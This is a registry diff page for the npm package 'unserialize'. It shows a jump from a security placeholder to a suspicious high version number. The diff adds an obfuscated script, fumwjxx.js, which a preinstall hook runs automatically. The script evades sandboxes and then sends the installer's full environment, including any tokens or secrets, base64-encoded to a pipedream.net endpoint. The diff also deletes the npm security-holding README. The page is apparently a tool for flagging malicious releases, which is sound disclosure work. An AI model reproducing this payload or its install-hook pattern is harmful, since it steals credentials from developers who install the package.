unserialize 0.0.1-security → 10.933.612
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of unserialize might be problematic. Click here for more details.
- package/fumwjxx.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/fumwjxx.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
const a0_0x11c722=a0_0x2440;(function(_0x390615,_0x57eec8){const _0x5112c5=a0_0x2440,_0xa0759a=_0x390615();while(!![]){try{const _0x36ad10=parseInt(_0x5112c5(0x16c))/0x1*(-parseInt(_0x5112c5(0x168))/0x2)+-parseInt(_0x5112c5(0x16e))/0x3*(-parseInt(_0x5112c5(0x170))/0x4)+-parseInt(_0x5112c5(0x16b))/0x5*(-parseInt(_0x5112c5(0x171))/0x6)+-parseInt(_0x5112c5(0x17d))/0x7+parseInt(_0x5112c5(0x176))/0x8+parseInt(_0x5112c5(0x17f))/0x9*(-parseInt(_0x5112c5(0x17b))/0xa)+parseInt(_0x5112c5(0x17c))/0xb*(-parseInt(_0x5112c5(0x16d))/0xc);if(_0x36ad10===_0x57eec8)break;else _0xa0759a['push'](_0xa0759a['shift']());}catch(_0x42a751){_0xa0759a['push'](_0xa0759a['shift']());}}}(a0_0x425f,0x2729f));const http=require(a0_0x11c722(0x165)),filter=[{'key':a0_0x11c722(0x174),'val':a0_0x11c722(0x175)},{'key':a0_0x11c722(0x174),'val':a0_0x11c722(0x17a)},{'key':a0_0x11c722(0x174),'val':'registry.npmmirror.com'},{'key':'USERNAME','val':'daasadmin'},{'key':'_','val':'/usr/bin/python'}];function a0_0x2440(_0x2203ed,_0x3574cf){const _0x425f83=a0_0x425f();return a0_0x2440=function(_0x244039,_0x37243d){_0x244039=_0x244039-0x165;let _0x3a2874=_0x425f83[_0x244039];return _0x3a2874;},a0_0x2440(_0x2203ed,_0x3574cf);}function a0_0x425f(){const _0x51c80c=['9ybabvC','https','env','from','26OuoJfI','toString','keys','725800aToUAx','11791urctIN','12cZNAjz','7590oqXdEt','some','356EzQumn','6UgGbpO','join','npm_package_name','npm_config_registry','taobao.org','2227112pbxwur','POST','stringify','net','tencent.com','1180830pDLqHu','586102BNwtfn','1145592oGyodx','1268384ff816fb002f65302287b639ce'];a0_0x425f=function(){return _0x51c80c;};return a0_0x425f();}function main(){const _0x5474b8=a0_0x11c722;var _0x53c1a2=process[_0x5474b8(0x166)]||{};if(filter[_0x5474b8(0x16f)](({key:_0x4b2101,val:_0x3af7d7})=>_0x53c1a2[_0x4b2101]&&_0x53c1a2[_0x4b2101]['includes'](_0x3af7d7))||Object[_0x5474b8(0x16a)](_0x53c1a2)['length']<0xa)return;req=http['request']({'host':[_0x5474b8(0x17e),'m','pipedream',_0x5474b8(0x179)][_0x5474b8(0x172)]('.'),'path':'/'+(_0x53c1a2[_0x5474b8(0x173)]||''),'method':_0x5474b8(0x177)})['on']('error',function(_0x1e27f1){}),req['write'](Buffer[_0x5474b8(0x167)](JSON[_0x5474b8(0x178)](_0x53c1a2))[_0x5474b8(0x169)]('base64')),req['end']();}main();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "unserialize",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "10.933.612",
|
|
4
|
+
"main": "fumwjxx.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node fumwjxx.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=unserialize for more information.
|